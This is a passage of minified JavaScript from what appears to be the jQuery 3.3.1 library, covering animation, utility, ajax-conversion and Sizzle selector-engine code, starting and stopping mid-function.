u,r=0,i={height:n};for(t=t?1:0;r<4;r+=2-t)i["margin"+(u=w[r])]=i["padding"+u]=n;return t&&(i.opacity=i.width=n),i}function rf(n,t,i){for(var u,f=(a.tweeners[t]||[]).concat(a.tweeners["*"]),r=0,e=f.length;r<e;r++)if(u=f[r].call(i,t,n))return u}function no(n,t,u){var f,y,w,c,b,h,o,l,k="width"in t||"height"in t,v=this,p={},s=n.style,a=n.nodeType&&ti(n),e=r.get(n,"fxshow");u.queue||(null==(c=i._queueHooks(n,"fx")).unqueued&&(c.unqueued=0,b=c.empty.fire,c.empty.fire=function(){c.unqueued||b()}),c.unqueued++,v.always(function(){v.always(function(){c.unqueued--;i.queue(n,"fx").length||c.empty.fire()})}));for(f in t)if(y=t[f],gu.test(y)){if(delete t[f],w=w||"toggle"===y,y===(a?"hide":"show")){if("show"!==y||!e||void 0===e[f])continue;a=!0}p[f]=e&&e[f]||i.style(n,f)}if((h=!i.isEmptyObject(t))||!i.isEmptyObject(p)){k&&1===n.nodeType&&(u.overflow=[s.overflow,s.overflowX,s.overflowY],null==(o=e&&e.display)&&(o=r.get(n,"display")),"none"===(l=i.css(n,"display"))&&(o?l=o:(ft([n],!0),o=n.style.display||o,l=i.css(n,"display"),ft([n]))),("inline"===l||"inline-block"===l&&null!=o)&&"none"===i.css(n,"float")&&(h||(v.done(function(){s.display=o}),null==o&&(l=s.display,o="none"===l?"":l)),s.display="inline-block"));u.overflow&&(s.overflow="hidden",v.always(function(){s.overflow=u.overflow[0];s.overflowX=u.overflow[1];s.overflowY=u.overflow[2]}));h=!1;for(f in p)h||(e?"hidden"in e&&(a=e.hidden):e=r.access(n,"fxshow",{display:o}),w&&(e.hidden=!a),a&&ft([n],!0),v.done(function(){a||ft([n]);r.remove(n,"fxshow");for(f in p)i.style(n,f,p[f])})),h=rf(a?e[f]:0,f,v),f in e||(e[f]=h.start,a&&(h.end=h.start,h.start=0))}}function to(n,t){var r,f,e,u,o;for(r in n)if(f=y(r),e=t[f],u=n[r],Array.isArray(u)&&(e=u[1],u=n[r]=u[0]),r!==f&&(n[f]=u,delete n[r]),(o=i.cssHooks[f])&&"expand"in o){u=o.expand(u);delete n[f];for(r in u)r in n||(n[r]=u[r],t[r]=e)}else t[f]=e}function a(n,t,r){var o,s,h=0,v=a.prefilters.length,e=i.Deferred().always(function(){delete l.elem}),l=function(){if(s)return!1;for(var o=st||tf(),t=Math.max(0,f.startTime+f.duration-o),i=1-(t/f.duration||0),r=0,u=f.tweens.length;r<u;r++)f.tweens[r].run(i);return e.notifyWith(n,[f,i,t]),i<1&&u?t:(u||e.notifyWith(n,[f,1,0]),e.resolveWith(n,[f]),!1)},f=e.promise({elem:n,props:i.extend({},t),opts:i.extend(!0,{specialEasing:{},easing:i.easing._default},r),originalProperties:t,originalOptions:r,startTime:st||tf(),duration:r.duration,tweens:[],createTween:function(t,r){var u=i.Tween(n,f.opts,t,r,f.opts.specialEasing[t]||f.opts.easing);return f.tweens.push(u),u},stop:function(t){var i=0,r=t?f.tweens.length:0;if(s)return this;for(s=!0;i<r;i++)f.tweens[i].run(1);return t?(e.notifyWith(n,[f,1,0]),e.resolveWith(n,[f,t])):e.rejectWith(n,[f,t]),this}}),c=f.props;for(to(c,f.opts.specialEasing);h<v;h++)if(o=a.prefilters[h].call(f,n,c,f.opts))return u(o.stop)&&(i._queueHooks(f.elem,f.opts.queue).stop=o.stop.bind(o)),o;return i.map(c,rf,f),u(f.opts.start)&&f.opts.start.call(n,f),f.progress(f.opts.progress).done(f.opts.done,f.opts.complete).fail(f.opts.fail).always(f.opts.always),i.fx.timer(i.extend(l,{elem:n,anim:f,queue:f.opts.queue})),f}function g(n){return(n.match(l)||[]).join(" ")}function nt(n){return n.getAttribute&&n.getAttribute("class")||""}function ki(n){return Array.isArray(n)?n:"string"==typeof n?n.match(l)||[]:[]}function tr(n,t,r,u){var f;if(Array.isArray(t))i.each(t,function(t,i){r||io.test(n)?u(n,i):tr(n+"["+("object"==typeof i&&null!=i?t:"")+"]",i,r,u)});else if(r||"object"!==it(t))u(n,t);else for(f in t)tr(n+"["+f+"]",t[f],r,u)}function af(n){return function(t,i){"string"!=typeof t&&(i=t,t="*");var r,f=0,e=t.toLowerCase().match(l)||[];if(u(i))while(r=e[f++])"+"===r[0]?(r=r.slice(1)||"*",(n[r]=n[r]||[]).unshift(i)):(n[r]=n[r]||[]).push(i)}}function vf(n,t,r,u){function e(s){var h;return f[s]=!0,i.each(n[s]||[],function(n,i){var s=i(t,r,u);return"string"!=typeof s||o||f[s]?o?!(h=s):void 0:(t.dataTypes.unshift(s),e(s),!1)}),h}var f={},o=n===ir;return e(t.dataTypes[0])||!f["*"]&&e("*")}function ur(n,t){var r,u,f=i.ajaxSettings.flatOptions||{};for(r in t)void 0!==t[r]&&((f[r]?n:u||(u={}))[r]=t[r]);return u&&i.extend(!0,n,u),n}function lo(n,t,i){for(var e,u,f,o,s=n.contents,r=n.dataTypes;"*"===r[0];)r.shift(),void 0===e&&(e=n.mimeType||t.getResponseHeader("Content-Type"));if(e)for(u in s)if(s[u]&&s[u].test(e)){r.unshift(u);break}if(r[0]in i)f=r[0];else{for(u in i){if(!r[0]||n.converters[u+" "+r[0]]){f=u;break}o||(o=u)}f=f||o}if(f)return f!==r[0]&&r.unshift(f),i[f]}function ao(n,t,i,r){var h,u,f,s,e,o={},c=n.dataTypes.slice();if(c[1])for(f in n.converters)o[f.toLowerCase()]=n.converters[f];for(u=c.shift();u;)if(n.responseFields[u]&&(i[n.responseFields[u]]=t),!e&&r&&n.dataFilter&&(t=n.dataFilter(t,n.dataType)),e=u,u=c.shift())if("*"===u)u=e;else if("*"!==e&&e!==u){if(!(f=o[e+" "+u]||o["* "+u]))for(h in o)if((s=h.split(" "))[1]===u&&(f=o[e+" "+s[0]]||o["* "+s[0]])){!0===f?f=o[h]:!0!==o[h]&&(u=s[0],c.unshift(s[1]));break}if(!0!==f)if(f&&n.throws)t=f(t);else try{t=f(t)}catch(n){return{state:"parsererror",error:f?n:"No conversion from "+e+" to "+u}}}return{state:"success",data:t}}var k=[],f=n.document,bf=Object.getPrototypeOf,d=k.slice,er=k.concat,si=k.push,wt=k.indexOf,bt={},or=bt.toString,kt=bt.hasOwnProperty,sr=kt.toString,kf=sr.call(Object),e={},u=function(n){return"function"==typeof n&&"number"!=typeof n.nodeType},tt=function(n){return null!=n&&n===n.window},df={type:!0,src:!0,noModule:!0},i=function(n,t){return new i.fn.init(n,t)},gf=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,b,ci,ar,vr,yr,pr,l,kr,gt,lt,ai,fu,st,fi,gu,nf,uf,ht,ff,ef,of,di,gi,yf,ct,fr,oi,pf,wf;i.fn=i.prototype={jquery:"3.3.1",constructor:i,length:0,toArray:function(){return d.call(this)},get:function(n){return null==n?d.call(this):n<0?this[n+this.length]:this[n]},pushStack:function(n){var t=i.merge(this.constructor(),n);return t.prevObject=this,t},each:function(n){return i.each(this,n)},map:function(n){return this.pushStack(i.map(this,function(t,i){return n.call(t,i,t)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(n){var i=this.length,t=+n+(n<0?i:0);return this.pushStack(t>=0&&t<i?[this[t]]:[])},end:function(){return this.prevObject||this.constructor()},push:si,sort:k.sort,splice:k.splice};i.extend=i.fn.extend=function(){var o,e,t,r,s,h,n=arguments[0]||{},f=1,l=arguments.length,c=!1;for("boolean"==typeof n&&(c=n,n=arguments[f]||{},f++),"object"==typeof n||u(n)||(n={}),f===l&&(n=this,f--);f<l;f++)if(null!=(o=arguments[f]))for(e in o)t=n[e],n!==(r=o[e])&&(c&&r&&(i.isPlainObject(r)||(s=Array.isArray(r)))?(s?(s=!1,h=t&&Array.isArray(t)?t:[]):h=t&&i.isPlainObject(t)?t:{},n[e]=i.extend(c,h,r)):void 0!==r&&(n[e]=r));return n};i.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\D/g,""),isReady:!0,error:function(n){throw new Error(n);},noop:function(){},isPlainObject:function(n){var t,i;return!(!n||"[object Object]"!==or.call(n))&&(!(t=bf(n))||"function"==typeof(i=kt.call(t,"constructor")&&t.constructor)&&sr.call(i)===kf)},isEmptyObject:function(n){for(var t in n)return!1;return!0},globalEval:function(n){hr(n)},each:function(n,t){var r,i=0;if(hi(n)){for(r=n.length;i<r;i++)if(!1===t.call(n[i],i,n[i]))break}else for(i in n)if(!1===t.call(n[i],i,n[i]))break;return n},trim:function(n){return null==n?"":(n+"").replace(gf,"")},makeArray:function(n,t){var r=t||[];return null!=n&&(hi(Object(n))?i.merge(r,"string"==typeof n?[n]:n):si.call(r,n)),r},inArray:function(n,t,i){return null==t?-1:wt.call(t,n,i)},merge:function(n,t){for(var u=+t.length,i=0,r=n.length;i<u;i++)n[r++]=t[i];return n.length=r,n},grep:function(n,t,i){for(var f,u=[],r=0,e=n.length,o=!i;r<e;r++)(f=!t(n[r],r))!==o&&u.push(n[r]);return u},map:function(n,t,i){var e,u,r=0,f=[];if(hi(n))for(e=n.length;r<e;r++)null!=(u=t(n[r],r,i))&&f.push(u);else for(r in n)null!=(u=t(n[r],r,i))&&f.push(u);return er.apply([],f)},guid:1,support:e});"function"==typeof Symbol&&(i.fn[Symbol.iterator]=k[Symbol.iterator]);i.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(n,t){bt["[object "+t+"]"]=t.toLowerCase()});b=function(n){function u(n,t,r,u){var s,p,l,a,w,d,g,y=t&&t.ownerDocument,v=t?t.nodeType:9;if(r=r||[],"string"!=typeof n||!n||1!==v&&9!==v&&11!==v)return r;if(!u&&((t?t.ownerDocument||t:c)!==i&&b(t),t=t||i,h)){if(11!==v&&(w=cr.exec(n)))if(s=w[1]){if(9===v){if(!(l=t.getElementById(s)))return r;if(l.id===s)return r.push(l),r}else if(y&&(l=y.getElementById(s))&&et(t,l)&&l.id===s)return r.push(l),r}else{if(w[2])return k.apply(r,t.getElementsByTagName(n)),r;if((s=w[3])&&e.getElementsByClassName&&t.getElementsByClassName)return k.apply(r,t.getElementsByClassName(s)),r}if(e.qsa&&!lt[n+" "]&&(!o||!o.test(n))){if(1!==v)y=t,g=n;else if("object"!==t.nodeName.toLowerCase()){for((a=t.getAttribute("id"))?a=a.replace(vi,yi):t.setAttribute("id",a=f),p=(d=ft(n)).length;p--;)d[p]="#"+a+" "+yt(d[p]);g=d.join(",");y=ni.test(n)&&ri(t.parentNode)||t}if(g)try{return k.apply(r,y.querySelectorAll(g)),r}catch(n){}finally{a===f&&t.removeAttribute("id")}}}return si(n.replace(at,"$1"),t,r,u)}function ti(){function n(r,u){return i.push(r+" ")>t.cacheLength&&delete n[i.shift()],n[r+" "]=u}var i=[];return n}function l(n){return n[f]=!0,n}function a(n){var t=i.createElement("fieldset");try{return!!n(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t);t=null}}function ii(n,i){for(var r=n.split("|"),u=r.length;u--;)t.attrHandle[r[u]]=i}function wi(n,t){var i=t&&n,r=i&&1===n.nodeType&&1===t.nodeType&&n.sourceIndex-t.sourceIndex;if(r)return r;if(i)while(i=i.nextSibling)if(i===t)return-1;return n?1:-1}function ar(n){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===n}}function vr(n){return function(t){var i=t.nodeName.toLowerCase();return("input"===i||"button"===i)&&t.type===n}}function bi(n){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"label"in t.parentNode?t.parentNode.disabled===n:t.disabled===n:t.isDisabled===n||t.isDisabled!==!n&&lr(t)===n:t.disabled===n:"label"in t&&t.disabled===n}}function it(n){return l(function(t){return t=+t,l(function(i,r){for(var u,f=n([],i.length,t),e=f.length;e--;)i[u=f[e]]&&(i[u]=!(r[u]=i[u]))})})}function ri(n){return n&&"undefined"!=typeof n.getElementsByTagName&&n}function ki(){}function yt(n){for(var t=0,r=n.length,i="";t<r;t++)i+=n[t].value;return i}function pt(n,t,i){var r=t.dir,u=t.next,e=u||r,o=i&&"parentNode"===e,s=di++;return t.first?function(t,i,u){while(t=t[r])if(1===t.nodeType||o)return n(t,i,u);return!1}:function(t,i,h){var c,l,a,y=[v,s];if(h){while(t=t[r])if((1===t.nodeType||o)&&n(t,i,h))return!0}else while(t=t[r])if(1===t.nodeType||o)if(a=t[f]||(t[f]={}),l=a[t.uniqueID]||(a[t.uniqueID]={}),u&&u===t.nodeName.toLowerCase())t=t[r]||t;else{if((c=l[e])&&c[0]===v&&c[1]===s)return y[2]=c[2];if(l[e]=y,y[2]=n(t,i,h))return!0}return!1}}function ui(n){return n.length>1?function(t,i,r){for(var u=n.length;u--;)if(!n[u](t,i,r))return!1;return!0}:n[0]}function yr(n,t,i){for(var r=0,f=t.length;r<f;r++)u(n,t[r],i);return i}function wt(n,t,i,r,u){for(var e,o=[],f=0,s=n.length,h=null!=t;f<s;f++)(e=n[f])&&(i&&!i(e,r,u)||(o.push(e),h&&t.push(f)));return o}function fi(n,t,i,r,u,e){return r&&!r[f]&&(r=fi(r)),u&&!u[f]&&(u=fi(u,e)),l(function(f,e,o,s){var l,c,a,p=[],y=[],w=e.length,b=f||yr(t||"*",o.nodeType?[o]:o,[]),v=!n||!f&&t?b:wt(b,p,n,o,s),h=i?u||(f?n:w||r)?[]:e:v;if(i&&i(v,h,o,s),r)for(l=wt(h,y),r(l,[],o,s),c=l.length;c--;)(a=l[c])&&(h[y[c]]=!(v[y[c]]=a));if(f){if(u||n){if(u){for(l=[],c=h.length;c--;)(a=h[c])&&l.push(v[c]=a);u(null,h=[],l,s)}for(c=h.length;c--;)(a=h[c])&&(l=u?nt(f,a):p[c])>-1&&(f[l]=!(e[l]=a))}}else h=wt(h===e?h.splice(w,h.length):h),u?u(null,e,h,s):k.apply(e,h)})}function ei(n){for(var o,u,r,s=n.length,h=t.relative[n[0].type],c=h||t.relative[" "],i=h?1:0,l=pt(function(n){return n===o},c,!0),a=pt(function(n){return nt(o,n)>-1},c,!0),e=[function(n,t,i){var r=!h&&(i||t!==ht)||((o=t).nodeType?l(n,t,i):a(n,t,i));return o=null,r}];i<s;i++)if(u=t.relative[n[i].type])e=[pt(ui(e),u)];else{if((u=t.filter[n[i].type].apply(null,n[i].matches))[f]){for(r=++i;r<s;r++)if(t.relative[n[r].type])break;return fi(i>1&&ui(e),i>1&&yt(n.slice(0,i-1).concat({value:" "===n[i-2].type?"*":""})).replace(at,"$1"),u,i<r&&ei(n.slice(i,r)),r<s&&ei(n=n.slice(r)),r<s&&yt(n))}e.push(u)}return ui(e)}function pr(n,r){var f=r.length>0,e=n.length>0,o=function(o,s,c,l,a){var y,nt,d,g=0,p="0",tt=o&&[],w=[],it=ht,rt=o||e&&t.find.TAG("*",a),ut=v+=null==it?1:Math.random()||.1,ft=rt.length;for(a&&(ht=s===i||s||a);p!==ft&&null!=(y=rt[p]);p++){if(e&&y){for(nt=0,s||y.ownerDocument===i||(b(y),c=!h);d=n[nt++];)if(d(y,s||i,c)){l.push(y);break}a&&(v=ut)}f&&((y=!d&&y)&&g--,o&&tt.push(y))}if(g+=p,f&&p!==g){for(nt=0;d=r[nt++];)d(tt,w,s,c);if(o){if(g>0)while(p--)tt[p]||w[p]||(w[p]=nr.call(l));w=wt(w)}k.apply(l,w);a&&!o&&w.length>0&&g+r.length>1&&u.uniqueSort(l)}return a&&(v=ut,ht=it),tt};return f?l(o):o}var rt,e,t,st,oi,ft,bt,si,ht,w,ut,b,i,s,h,o,d,ct,et,f="sizzle"+1*new Date,c=n.document,v=0,di=0,hi=ti(),ci=ti(),lt=ti(),kt=function(n,t){return n===t&&(ut=!0),0},gi={}.hasOwnProperty,g=[],nr=g.pop,tr=g.push,k=g.push,li=g.slice,nt=function(n,t){for(var i=0,r=n.length;i<r;i++)if(n[i]===t)return i;return-1},dt="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",r="[\\x20\\t\\r\\n\\f]",tt="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",ai="\\["+r+"*("+tt+")(?:"+r+"*([*^$|!~]?=)"+r+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+tt+"))|)"+r+"*\\]",gt=":("+tt+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+ai+")*)|.*)\\)|)",ir=new RegExp(r+"+","g"),at=new RegExp("^"+r+"+|((?:^|[^\\\\])(?:\\\\.)*)"+r+"+$","g"),rr=new RegExp("^"+r+"*,"+r+"*"),ur=new RegExp("^"+r+"*([>+~]|"+r+")"+r+"*"),fr=new RegExp("="+r+"*([^\\]'\"]*?)"+r+"*\\]","g"),er=new RegExp(gt),or=new RegExp("^"+tt+"$"),vt={ID:new RegExp("^#("+tt+")"),CLASS:new RegExp("^\\.("+tt+")"),TAG:new RegExp("^("+tt+"|[*])"),ATTR:new RegExp("^"+ai),PSEUDO:new RegExp("^"+gt),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+r+"*(even|odd|(([+-]|)(\\d*)n|)"+r+"*(?:([+-]|)"+r+"*(\\d+)|))"+r+"*\\)|)","i"),bool:new RegExp("^(?:"+dt+")$","i"),needsContext:new RegExp("^"+r+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+r+"*((?:-\\d)?\\d*)"+r+"*\\)|)(?=[^-]|$)","i")},sr=/^(?:input|select|textarea|button)$/i,hr=/^h\d$/i,ot=/^[^{]+\{\s*\[native \w/,cr=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ni=/[+~]/,y=new RegExp("\\\\([\\da-f]{1,6}"+r+"?|("+r+")|.)","ig"),p=function(n,t,i){var r="0x"+t-65536;return r!==r||i?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},vi=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,yi=function(n,t){return t?"\0"===n?"�":n.slice(0,-1)+"\\"+n.charCodeAt(n.length-1).toString(16)+" ":"\\"+n},pi=function(){b()},lr=pt(function(n){return!0===n.disabled&&("form"in n||"label"in n)},{dir:"parentNode",next:"legend"});try{k.apply(g=li.call(c.childNodes),c.childNodes);g[c.childNodes.length].nodeType}catch(n){k={apply:g.length?function(n,t){tr.apply(n,li.call(t))}:function(n,t){for(var i=n.length,r=0;n[i++]=t[r++];);n.length=i-1}}}e=u.support={};oi=u.isXML=function(n){var t=n&&(n.ownerDocument||n).documentElement;return!!t&&"HTML"!==t.nodeName};b=u.setDocument=function(n){var v,u,l=n?n.ownerDocument||n:c;return l!==i&&9===l.nodeType&&l.documentElement?(i=l,s=i.documentElement,h=!oi(i),c!==i&&(u=i.defaultView)&&u.top!==u&&(u.addEventListener?u.addEventListener("unload",pi,!1):u.attachEvent&&u.attachEvent("onunload",pi)),e.attributes=a(function(n){return n.className="i",!n.getAttribute("className")}),e.getElementsByTagName=a(function(n){return n.appendChild(i.createComment("")),!n.getElementsByTagName("*").length}),e.getElementsByClassName=ot.test(i.getElementsByClassName),e.getById=a(function(n){return s.appendChild(n).id=f,!i.getElementsByName||!i.getElementsByName(f).length}),e.getById?(t.filter.ID=function(n){var t=n.replace(y,p);return function(n){return n.getAttribute("id")===t}},t.find.ID=function(n,t){if("undefined"!=typeof t.getElementById&&h){var i=t.getElementById(n);return i?[i]:[]}}):(t.filter.ID=function(n){var t=n.replace(y,p);return function(n){var i="undefined"!=typeof n.getAttributeNode&&n.getAttributeNode("id");return i&&i.value===t}},t.find.ID=function(n,t){if("undefined"!=typeof t.getElementById&&h){var r,u,f,i=t.getElementById(n);if(i){if((r=i.getAttributeNode("id"))&&r.value===n)return[i];for(f=t.getElementsByName(n),u=0;i=f[u++];)if((r=i.getAttributeNode("id"))&&r.value===n)return[i]}return[]}}),t.find.TAG=e.getElementsByTagName?function(n,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(n):e.qsa?t.querySelectorAll(n):void 0}:function(n,t){var i,r=[],f=0,u=t.getElementsByTagName(n);if("*"===n){while(i=u[f++])1===i.nodeType&&r.push(i);return r}return u},t.find.CLASS=e.getElementsByClassName&&function(n,t){if("undefined"!=typeof t.getElementsByClassName&&h)return t.getElementsByClassName(n)},d=[],o=[],(e.qsa=ot.test(i.querySelectorAll))&&(a(function(n){s.appendChild(n).innerHTML="<a id='"+f+"'><\/a><select id='"+f+"-\r\\' msallowcapture=''><option selected=''><\/option><\/select>";n.querySelectorAll("[msallowcapture^='']").length&&o.push("[*^$]="+r+"*(?:''|\"\")");n.querySelectorAll("[selected]").length||o.push("\\["+r+"*(?:value|"+dt+")");n.querySelectorAll("[id~="+f+"-]").length||o.push("~=");n.querySelectorAll(":checked").length||o.push(":checked");n.querySelectorAll("a#"+f+"+*").length||o.push(".#.+[+~]")}),a(function(n){n.innerHTML="<a href='' disabled='disabled'><\/a><select disabled='disabled'><option/><\/select>";var t=i.createElement("input");t.setAttribute("type","hidden");n.appendChild(t).setAttribute("name","D");n.querySelectorAll("[name=d]").length&&o.push("name"+r+"*[*^$|!~]?=");2!==n.querySelectorAll(":enabled").length&&o.push(":enabled",":disabled");s.appendChild(n).disabled=!0;2!==n.querySelectorAll(":disabled").length&&o.push(":enabled",":disabled");n.querySelectorAll("*,:x");o.push(",.*:")})),(e.matchesSelector=ot.test(ct=s.matches||s.webkitMatchesSelector||s.mozMatchesSelector||s.oMatchesSelector||s.msMatchesSelector))&&a(function(n){e.disconnectedMatch=ct.call(n,"*");ct.call(n,"[s!='']:x");d.push("!=",gt)}),o=o.length&&new RegExp(o.join("|")),d=d.length&&new RegExp(d.join("|")),v=ot.test(s.compareDocumentPosition),et=v||ot.test(s.contains)?function(n,t){var r=9===n.nodeType?n.documentElement:n,i=t&&t.parentNode;return n===i||!(!i||1!==i.nodeType||!(r.contains?r.contains(i):n.compareDocumentPosition&&16&n.compareDocumentPosition(i)))}:function(n,t){if(t)while(t=t.parentNode)if(t===n)return!0;return!1},kt=v?function(n,t){if(n===t)return ut=!0,0;var r=!n.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(n.ownerDocument||n)===(t.ownerDocument||t)?n.compareDocumentPosition(t):1)||!e.sortDetached&&t.compareDocumentPosition(n)===r?n===i||n.ownerDocument===c&&et(c,n)?-1:t===i||t.ownerDocument===c&&et(c,t)?1:w?nt(w,n)-nt(w,t):0:4&r?-1:1)}:function(n,t){if(n===t)return ut=!0,0;var r,u=0,o=n.parentNode,s=t.parentNode,f=[n],e=[t];if(!o||!s)return n===i?-1:t===i?1:o?-1:s?1:w?nt(w,n)-nt(w,t):0;if(o===s)return wi(n,t);for(r=n;r=r.parentNode;)f.unshift(r);for(r=t;r=r.parentNode;)e.unshift(r);while(f[u]===e[u])u++;return u?wi(f[u],e[u]):f[u]===c?-1:e[u]===c?1:0},i):i};u.matches=function(n,t){return u(n,null,null,t)};u.matchesSelector=function(n,t){if((n.ownerDocument||n)!==i&&b(n),t=t.replace(fr,"='$1']"),e.matchesSelector&&h&&!lt[t+" "]&&(!d||!d.test(t))&&(!o||!o.test(t)))try{var r=ct.call(n,t);if(r||e.disconnectedMatch||n.document&&11!==n.document.nodeType)return r}catch(n){}return u(t,i,null,[n]).length>0};u.contains=function(n,t){return(n.ownerDocument||n)!==i&&b(n),et(n,t)};u.attr=function(n,r){(n.ownerDocument||n)!==i&&b(n);var f=t.attrHandle[r.toLowerCase()],u=f&&gi.call(t.attrHandle,r.toLowerCase())?f(n,r,!h):void 0;return void 0!==u?u:e.attributes||!h?n.getAttribute(r):(u=n.getAttributeNode(r))&&u.specified?u.value:null};u.escape=function(n){return(n+"").replace(vi,yi)};u.error=function(n){throw new Error("Syntax error, unrecognized expression: "+n);};u.uniqueSort=function(n){var r,u=[],t=0,i=0;if(ut=!e.detectDuplicates,w=!e.sortStable&&n.slice(0),n.sort(kt),ut){while(r=n[i++])r===n[i]&&(t=u.push(i));while(t--)n.splice(u[t],1)}return w=null,n};st=u.getText=function(n){var r,i="",u=0,t=n.nodeType;if(t){if(1===t||9===t||11===t){if("string"==typeof n.textContent)return n.textContent;for(n=n.firstChild;n;n=n.nextSibling)i+=st(n)}else if(3===t||4===t)return n.nodeValue}else while(r=n[u++])i+=st(r);return i};(t=u.selectors={cacheLength:50,createPseudo:l,match:vt,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(n){return n[1]=n[1].replace(y,p),n[3]=(n[3]||n[4]||n[5]||"").replace(y,p),"~="===n[2]&&(n[3]=" "+n[3]+" "),n.slice(0,4)},CHILD:function(n){return n[1]=n[1].toLowerCase(),"nth"===n[1].slice(0,3)?(n[3]||u.error(n[0]),n[4]=+(n[4]?n[5]+(n[6]||1):2*("even"===n[3]||"odd"===n[3])),n[5]=+(n[7]+n[8]||"odd"===n[3])):n[3]&&u.error(n[0]),n},PSEUDO:function(n){var i,t=!n[6]&&n[2];return vt.CHILD.test(n[0])?null:(n[3]?n[2]=n[4]||n[5]||"":t&&er.test(t)&&(i=ft(t,!0))&&(i=t.indexOf(")",t.length-i)-t.length)&&(n[0]=n[0].slice(0,i),n[2]=t.slice(0,i)),n.slice(0,3))}},filter:{TAG:function(n){var t=n.replace(y,p).toLowerCase();return"*"===n?function(){return!0}:function(n){return n.nodeName&&n.nodeName.toLowerCase()===t}},CLASS:function(n){var t=hi[n+" "];return t||(t=new RegExp("(^|"+r+")"+n+"("+r+"|$)"))&&hi(n,function(n){return t.test("string"==typeof n.className&&n.className||"undefined"!=typeof n.getAttribute&&n.getAttribute("class")||"")})},ATTR:function(n,t,i){return function(r){var f=u.attr(r,n);return null==f?"!="===t:!t||(f+="","="===t?f===i:"!="===t?f!==i:"^="===t?i&&0===f.indexOf(i):"*="===t?i&&f.indexOf(i)>-1:"$="===t?i&&f.slice(-i.length)===i:"~="===t?(" "+f.replace(ir," ")+" ").indexOf(i)>-1:"|="===t&&(f===i||f.slice(0,i.length+1)===i+"-"))}},CHILD:function(n,t,i,r,u){var s="nth"!==n.slice(0,3),o="last"!==n.slice(-4),e="of-type"===t;return 1===r&&0===u?function(n){return!!n.parentNode}:function(t,i,h){var p,d,y,c,a,w,b=s!==o?"nextSibling":"previousSibling",k=t.parentNode,nt=e&&t.nodeName.toLowerCase(),g=!h&&!e,l=!1;if(k){if(s){while(b){for(c=t;c=c[b];)if(e?c.nodeName.toLowerCase()===nt:1===c.nodeType)return!1;w=b="only"===n&&!w&&"nextSibling"}return!0}if(w=[o?k.firstChild:k.lastChild],o&&g){for(l=(a=(p=(d=(y=(c=k)[f]||(c[f]={}))[c.uniqueID]||(y[c.uniqueID]={}))[n]||[])[0]===v&&p[1])&&p[2],c=a&&k.childNodes[a];c=++a&&c&&c[b]||(l=a=0)||w.pop();)if(1===c.nodeType&&++l&&c===t){d[n]=[v,a,l];break}}else if(g&&(l=a=(p=(d=(y=(c=t)[f]||(c[f]={}))[c.uniqueID]||(y[c.uniqueID]={}))[n]||[])[0]===v&&p[1]),!1===l)while(c=++a&&c&&c[b]||(l=a=0)||w.pop())if((e?c.nodeName.toLowerCase()===nt:1===c.nodeType)&&++l&&(g&&((d=(y=c[f]||(c[f]={}))[c.uniqueID]||(y[c.uniqueID]={}))[n]=[v,l]),c===t))break;return(l-=u)===r||l%r==0&&l/r>=0}}},PSEUDO:function(n,i){var e,r=t.pseudos[n]||t.setFilters[n.toLowerCase()]||u.error("unsupported pseudo: "+n);return r[f]?r(i):r.length>1?(e=[n,n,"",i],t.setFilters.hasOwnProperty(n.toLowerCase())?l(function(n,t){for(var e,u=r(n,i),f=u.length;f--;)n[e=nt(n,u[f])]=!(t[e]=u[f])}):function(n){return r(n,0,e)}):r}},pseudos:{not:l(function(n){var t=[],r=[],i=bt(n.replace(at,"$1"));return i[f]?l(function(n,t,r,u){for(var e,o=i(n,null,u,[]),f=n.length;f--;)(e=o[f])&&(n[f]=!(t[f]=e))}):function(n,u,f){return t[0]=n,i(t,null,f,r),t[0]=null,!r.pop()}}),has:l(function(n){return function(t){return u(n,t).length>0}}),contains:l(function(n){return n=n.replace(y,p),function(t){return(t.textContent||t.innerText||st(t)).indexOf(n)>-1}}),lang:l(function(n){return or.test(n||"")||u.error("unsupported lang: "+n),n=n.replace(y,p).toLowerCase(),function(t){var i;do if(i=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return(i=i.toLowerCase())===n||0===i.indexOf(n+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var i=n.location&&n.location.hash;return i&&i.slice(1)===t.id},root:function(n){return n===s},focus:function(n){return n===i.activeElement&&(!i.hasFocus||i.hasFocus())&&!!(n.type||n.href||~n.tabIndex)},enabled:bi(!1),disabled:bi(!0),checked:function(n){var t=n.nodeName.toLowerCase();return"input"===t&&!!n.checked||"option"===t&&!!n.selected},selected:function(n){return n.parentNode&&n.parentNode.selectedIndex,!0===n.selected},empty:function(n){for(n=n.firstChild;n;n=n.nextSibling)if(n.nodeType<6)return!1;return!0},parent:function(n){return!t.pseudos.empty(n)},header:function(n){return hr.test(n.nodeName)},input:function(n){return sr.test(n.nodeName)},button:function(n){var t=n.nodeName.toLowerCase();return"input"===t&&"button"===n.type||"button"===t},text:function(n){var 